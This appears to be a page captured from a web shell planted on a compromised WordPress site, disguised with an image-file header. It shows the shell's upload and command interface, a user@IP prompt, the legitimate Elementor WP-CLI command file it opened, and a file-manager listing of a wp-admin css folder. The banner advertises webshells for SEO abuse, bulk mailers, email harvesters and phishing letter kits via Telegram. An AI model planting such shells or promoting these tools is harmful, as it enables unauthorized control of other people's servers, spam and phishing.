����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eliteafr@216.73.217.105: ~ $
<?php
namespace Elementor\Modules\WpCli;

use Elementor\Api;
use Elementor\Plugin;
use Elementor\TemplateLibrary\Source_Local;
use Elementor\Utils;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

/**
 * Elementor Page Builder cli tools.
 */
class Command extends \WP_CLI_Command {

	/**
	 * Flush the Elementor Page Builder CSS Cache.
	 *
	 * [--network]
	 *      Flush CSS Cache for all the sites in the network.
	 *
	 * [--regenerate]
	 *      Re-create the CSS files. Otherwise they will be created by a page visit.
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor flush-css
	 *      - This will flush the CSS files for elementor page builder.
	 *
	 *  2. wp elementor flush-css --network
	 *      - This will flush the CSS files for elementor page builder for all the sites in the network.
	 *
	 *  3. wp elementor flush-css --regenerate
	 *      - This will flush the CSS files for elementor page builder and re-create the new CSS files.
	 *
	 * @since 2.1.0
	 * @access public
	 * @alias flush-css
	 */
	public function flush_css( $args, $assoc_args ) {
		$network = ! empty( $assoc_args['network'] ) && is_multisite();
		$should_regenerate = ! empty( $assoc_args['regenerate'] );

		if ( $network ) {
			$blog_ids = get_sites( [
				'fields' => 'ids',
				'number' => 0,
			] );

			foreach ( $blog_ids as $blog_id ) {
				switch_to_blog( $blog_id );

				$this->handle_flush( $should_regenerate, 'Flushed the Elementor CSS Cache for site - ' . get_option( 'home' ) );

				restore_current_blog();
			}
		} else {
			$this->handle_flush( $should_regenerate, 'Flushed the Elementor CSS Cache' );
		}
	}

	private function handle_flush( bool $should_regenerate, string $success_message ): void {
		Plugin::$instance->files_manager->clear_cache();

		if ( $should_regenerate ) {
			Plugin::$instance->files_manager->generate_css();
		}

		\WP_CLI::success( $success_message );
	}

	/**
	 * Print system info powered by Elementor
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor system-info
	 *      - This will print the System Info in JSON format
	 *
	 * @since 3.0.11
	 * @access public
	 * @alias system-info
	 */
	public function system_info() {
		echo wp_json_encode( \Elementor\Tracker::get_tracking_data() );
	}

	/**
	 * Replace old URLs with new URLs in all Elementor pages.
	 *
	 * [--force]
	 *      Suppress error messages. instead, return "0 database rows affected.".
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor replace-urls <old> <new>
	 *      - This will replace all <old> URLs with the <new> URL.
	 *
	 *  2. wp elementor replace-urls <old> <new> --force
	 *      - This will replace all <old> URLs with the <new> URL without throw errors.
	 *
	 * @access public
	 * @alias replace-urls
	 */
	public function replace_urls( $args, $assoc_args ) {
		if ( empty( $args[0] ) ) {
			\WP_CLI::error( 'Please set the `old` URL' );
		}

		if ( empty( $args[1] ) ) {
			\WP_CLI::error( 'Please set the `new` URL' );
		}

		try {
			$results = Utils::replace_urls( $args[0], $args[1] );
			\WP_CLI::success( $results );
		} catch ( \Exception $e ) {
			if ( isset( $assoc_args['force'] ) ) {
				\WP_CLI::success( '0 database rows affected.' );
			} else {
				\WP_CLI::error( $e->getMessage() );
			}
		}
	}

	/**
	 * Sync Elementor Library.
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor sync-library
	 *      - This will sync the library with Elementor cloud library.
	 *
	 * @since 2.1.0
	 * @access public
	 * @alias sync-library
	 */
	public function sync_library( $args, $assoc_args ) {
		// TODO:
		// \WP_CLI::warning( 'command is deprecated since 2.8.0 Please use: wp elementor library sync' );

		$data = Api::get_library_data( true );

		if ( empty( $data ) ) {
			\WP_CLI::error( 'Cannot sync library.' );
		}

		\WP_CLI::success( 'Library has been synced.' );
	}

	/**
	 * Import template files to the Library.
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor import-library <file-path>
	 *      - This will import a file or a zip of multiple files to the library.
	 *
	 * @since 2.1.0
	 * @access public
	 * @alias import-library
	 */
	public function import_library( $args, $assoc_args ) {
		// TODO:
		// \WP_CLI::warning( 'command is deprecated since 2.8.0 Please use: wp elementor library import' );

		if ( empty( $args[0] ) ) {
			\WP_CLI::error( 'Please set file path.' );
		}

		/** @var Source_Local $source */
		$source = Plugin::$instance->templates_manager->get_source( 'local' );

		$imported_items = $source->import_template( basename( $args[0] ), $args[0] );

		if ( is_wp_error( $imported_items ) ) {
			\WP_CLI::error( $imported_items->get_error_message() );
		}

		\WP_CLI::success( count( $imported_items ) . ' item(s) has been imported.' );
	}
}

Filemanager

Name Type Size Permission Actions
archive Folder 0755
colors Folder 0755
css Folder 0755
search_template_1775659388 Folder 0755
-20260614063740-20260614063829-20260614063917-20260614064006-20260614095446-20260614095540-20260614095637-20260620184507.htaccess File 127 B 0644
-20260614063740-20260614063829-20260614063917-20260614064006-20260614095446-20260614095540-20260614095637.htaccess File 127 B 0644
-20260614063740-20260614063829-20260614063917-20260614064006-20260616002906.htaccess File 127 B 0644
PROGRAMME2017.pdf File 153.34 KB 0644
about-rtl.css File 25.99 KB 0644
about-rtl.min-20260715114608.css File 19.85 KB 0644
about-rtl.min.css File 19.85 KB 0644
about.css File 25.95 KB 0644
admin-menu-rtl.css File 18.39 KB 0644
admin-menu-rtl.min.css File 14.89 KB 0644
admin-menu.css File 18.34 KB 0644
admin-menu.min.css File 14.87 KB 0644
code-editor-20260715124835.css File 1.54 KB 0644
code-editor-rtl.min.css File 1.41 KB 0644
code-editor.css File 1.54 KB 0644
code-editor.min-20260715105737.css File 1.4 KB 0644
code-editor.min.css File 1.4 KB 0644
color-picker-rtl.css File 3.78 KB 0644
color-picker-rtl.min.css File 3.06 KB 0644
color-picker.css File 3.74 KB 0644
color-picker.min.css File 3.05 KB 0644
command.php File 4.59 KB 0644
common-20260715115712.css File 75.91 KB 0644
common-rtl.css File 75.99 KB 0644
common-rtl.min.css File 57.58 KB 0644
common.css File 75.91 KB 0644
common.min.css File 57.53 KB 0644
customize-controls-rtl.css File 69.91 KB 0644
customize-controls-rtl.min.css File 58.7 KB 0644
customize-controls.css File 69.83 KB 0644
customize-controls.min.css File 58.66 KB 0644
customize-nav-menus-rtl.css File 21.62 KB 0644
customize-nav-menus-rtl.min.css File 17.72 KB 0644
customize-nav-menus.css File 21.58 KB 0644
customize-nav-menus.min.css File 17.71 KB 0644
customize-widgets-20260715115621.css File 12.27 KB 0644
customize-widgets-rtl.css File 12.3 KB 0644
customize-widgets-rtl.min.css File 9.39 KB 0644
customize-widgets.css File 12.27 KB 0644
customize-widgets.min.css File 9.38 KB 0644
dashboard-20260715124114.css File 29.1 KB 0644
dashboard-rtl-20260715124321.css File 29.13 KB 0644
dashboard-rtl.css File 29.13 KB 0644
dashboard-rtl.min-20260715124736.css File 22.13 KB 0644
dashboard-rtl.min.css File 22.13 KB 0644
dashboard.css File 29.1 KB 0644
dashboard.min-20260715124353.css File 22.14 KB 0644
dashboard.min.css File 22.14 KB 0644
deprecated-media-rtl.css File 6.5 KB 0644
deprecated-media-rtl.min.css File 5.37 KB 0644
deprecated-media.css File 6.46 KB 0644
deprecated-media.min-20260715120709.css File 5.36 KB 0644
deprecated-media.min.css File 5.36 KB 0644
edit-rtl.css File 37.07 KB 0644
edit-rtl.min.css File 29.18 KB 0644
edit.css File 37.03 KB 0644
edit.min.css File 29.17 KB 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260520214251.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522152815.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260523040552-20260525011520-20260525070401.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260523040552-20260525011520-20260526032823.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260523040552-20260525011520.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260523040552.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260526135942-20260526204823-20260526230035.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260526135942-20260526204823-20260526233217.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260526135942-20260526204823.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260526135942.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010.js File 29 B 0644
farbtastic-20260715124122.css File 611 B 0644
farbtastic-rtl-20260715124312.css File 647 B 0644
farbtastic-rtl.css File 647 B 0644
farbtastic-rtl.min-20260715124718.css File 538 B 0644
farbtastic-rtl.min.css File 538 B 0644
farbtastic.css File 611 B 0644
farbtastic.min-20260715124340.css File 537 B 0644
farbtastic.min.css File 537 B 0644
forms-rtl.css File 36.07 KB 0644
forms-rtl.min.css File 27.78 KB 0644
forms.css File 36.04 KB 0644
forms.min.css File 27.78 KB 0644
install-rtl.css File 6.05 KB 0644
install-rtl.min-20260715124358.css File 4.95 KB 0644
install-rtl.min.css File 4.95 KB 0644
install.css File 6.01 KB 0644
install.min.css File 4.95 KB 0644
l10n-20260715141127.css File 4.43 KB 0644
l10n-rtl.css File 4.47 KB 0644
l10n.css File 4.43 KB 0644
l10n.min.css File 3.13 KB 0644
list-tables-rtl.css File 43.14 KB 0644
list-tables-rtl.min.css File 34.87 KB 0644
list-tables.css File 43.08 KB 0644
list-tables.min.css File 34.84 KB 0644
loadable-interface.php File 286 B 0644
login-20260715120149.css File 7.82 KB 0644
login-rtl-20260715141052.css File 7.85 KB 0644
login-rtl.css File 7.85 KB 0644
login-rtl.min.css File 6.28 KB 0644
login.css File 7.82 KB 0644
login.min.css File 6.27 KB 0644
media-rtl.css File 26.35 KB 0644
media-rtl.min.css File 21.29 KB 0644
media.css File 26.3 KB 0644
media.min.css File 21.28 KB 0644
nav-menus-rtl.css File 17.56 KB 0644
nav-menus-rtl.min.css File 13.85 KB 0644
nav-menus.css File 17.5 KB 0644
nav-menus.min.css File 13.83 KB 0644
revisions-20260715140607.css File 9.91 KB 0644
revisions-rtl.css File 9.95 KB 0644
revisions-rtl.min.css File 8.13 KB 0644
revisions.css File 9.91 KB 0644
revisions.min.css File 8.11 KB 0644
settings-conditional.php File 992 B 0644
site-health-rtl.css File 6.13 KB 0644
site-health-rtl.min.css File 5.06 KB 0644
site-health.css File 6.09 KB 0644
site-health.min.css File 5.05 KB 0644
site-icon-rtl.css File 4.54 KB 0644
site-icon-rtl.min.css File 3.85 KB 0644
site-icon.css File 4.49 KB 0644
site-icon.min.css File 3.84 KB 0644
themes-rtl-20260715141154.css File 40.84 KB 0644
themes-rtl.css File 40.84 KB 0644
themes-rtl.min.css File 31.94 KB 0644
themes.css File 40.78 KB 0644
themes.min-20260715141153.css File 31.92 KB 0644
themes.min.css File 31.92 KB 0644
widgets-rtl.css File 17.25 KB 0644
widgets-rtl.min.css File 14.09 KB 0644
widgets.css File 17.22 KB 0644
widgets.min.css File 14.08 KB 0644
wordpress-helper.php File 512 B 0644
wp-admin-rtl.css File 490 B 0644
wp-admin-rtl.min.css File 550 B 0644
wp-admin.css File 395 B 0644
wp-admin.min.css File 490 B 0644
wrapper.php File 1.44 KB 0644